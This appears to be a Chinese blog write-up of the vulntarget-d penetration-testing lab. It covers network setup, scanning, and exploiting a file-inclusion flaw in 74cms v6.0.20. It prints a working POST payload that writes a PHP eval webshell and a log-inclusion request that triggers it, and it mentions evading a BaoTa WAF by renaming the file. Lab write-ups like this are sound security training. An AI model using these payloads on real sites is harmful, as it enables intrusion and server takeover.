首页 > 其他分享 >vulntarget-d-wp

vulntarget-d-wp

时间:2023-08-22 15:46:25浏览次数:38  
标签:__ 10.0 10.3 10.2 open 192.168 wp vulntarget

vulntarget-d

配置信息

系统 ip
kali 192.168.130.5
ubuntu 18 ip1: 192.168.130.8 ip2: 10.0.10.1
win7 10.0.10.134

网卡修改

ubuntu如果配置上双网卡没显示就如下操作:

// 修改配置文件
sudo vim /etc/network/interfaces
// 之后重启网络
sudo /etc/init.d/networking restart

文件内如下,也可以改成了静态的ip,这个随意。

image-20230708195208660

最后用列出所有网卡查看修改的情况, 网卡配置完成。

image-20230708195139943

实战

web打点

信息收集

发现了3306的MySQL有未授权,然后8888有个登录。

image-20230708195114105

用fscan扫一下,发现8888那有个登录入口一眼宝塔, 81有个骑士cms。

image-20230708195945689

在网页底部找到他的版本信息v6.0.20就可以去搜索历史漏洞。

image-20230708200737743

骑士cms文件包含

去网上搜了利用的文章,先用post写入一句话。

variable=1&tpl=<?php fputs(fopen("110.php","w"),"<?php eval(\$_POST[110]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

image-20230821145158836

然后开始包含日志文件,日志文件要和当天的日期一致。

variable=1&tpl=data/Runtime/Logs/Home/23_08_21.log

image-20230821145426286

这里有个点,当写的文件名是shell.php的时候会被宝塔给拦截了但是去Ubuntu里面看确实是写入了,这里直接换个文件名就ok的。

image-20230821150106089

内网渗透

Ubuntu提权

连上哥斯拉上来丝滑三连发现第二个网段,转战msf进行提权。

image-20230821145753365

本来想偷懒直接用哥斯拉反弹过去的,但是效果不好一下就会断掉。

image-20230709202344337

老老实实传msf

标签:__,10.0,10.3,10.2,open,192.168,wp,vulntarget
From: https://www.cnblogs.com/bktown/p/17648645.html

相关文章

  • WPF实现Element UI风格的日期时间选择器
    背景业务开发过程中遇到一个日期范围选择的需求,和ElementUI的DateTimePicker组件比较类似,由两个日历控件组成,联动选择起始时间和结束时间。问题WPF中提供了一个DatePicker的控件,主要由DatePickerTextBox、Button和一个Calendar组成,其中Calendar是后台代码动态添加的,因此不能直......
  • C# wpf 按钮 样式
    <ButtonWidth="312"Height="104"Click="Button_Click"><Button.Template><ControlTemplateTargetType="Button"><Grid>......
  • WPF绑定Enum到RadioButton
    将枚举型的数据类型绑定到单选按钮的IsChecked属性中,可以避免定义多个bool类型与之进行绑定,尤其是枚举类型较多时候,对bool对象的维护会更加复杂。1、定义枚举类型及值转换器internalenumGender{[Description("男")]Male,[Description("女")]Female,[Descri......
  • [SWPUCTF 2021 新生赛]hardrce
    [SWPUCTF2021新生赛]hardrce题目来源:nssctf题目类型:web涉及考点:rec1.上来直接代码审计<?phpheader("Content-Type:text/html;charset=utf-8");error_reporting(0);highlight_file(__FILE__);if(isset($_GET['wllm'])){$wllm=$_GET['wllm'];......
  • 【愚公系列】2023年08月 WPF控件专题 CheckBox控件详解
    (文章目录)前言WPF控件是WindowsPresentationFoundation(WPF)中的基本用户界面元素。它们是可视化对象,可以用来创建各种用户界面。WPF控件可以分为两类:原生控件和自定义控件。原生控件是由Microsoft提供的内置控件,如Button、TextBox、Label、ComboBox等。这些控件都是WPF中常见......
  • 【愚公系列】2023年08月 WPF控件专题 Button控件详解
    (文章目录)前言WPF控件是WindowsPresentationFoundation(WPF)中的基本用户界面元素。它们是可视化对象,可以用来创建各种用户界面。WPF控件可以分为两类:原生控件和自定义控件。原生控件是由Microsoft提供的内置控件,如Button、TextBox、Label、ComboBox等。这些控件都是WPF中常见......
  • WPF 转换器Converter 多值处理
    定义多值处理方法。usingSystem;usingSystem.Globalization;usingSystem.Windows.Data;namespacedemo_business.Converters{publicclassNumIntervalConverter:IMultiValueConverter{publicobjectConvert(object[]values,TypetargetType,objectparameter......
  • [SWPUCTF 2021 新生赛]error
    [SWPUCTF2021新生赛]error题目来源:nssctf题目类型:web涉及考点:SQL注入1.题目给了一个输入框,随便传点东西通过上面三次传入,我们可以判断闭合类型为单引号闭合发现没有回显位,但有报错提示,因此尝试报错注入2.extractValue()报错注入爆库名1'unionselect1,ext......
  • WPF初始化顺序
    WPF的初始化的顺序///<summary>///MainWindow.xaml的交互逻辑///</summary>publicpartialclassMainWindow:Window{publicMainWindow(){InitializeComponent();}privatevoidWindow_A......
  • WPF加载GIF的五种方式(Storyboard / WpfAnimatedGif / ImageAnimator / PictureBox / M
    部分内容参考博文WPF如何显示gif一、使用Storyboard效果:  (1)页面xaml:<Windowx:Class="PlayGifDemo.StoryboardWindow"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2......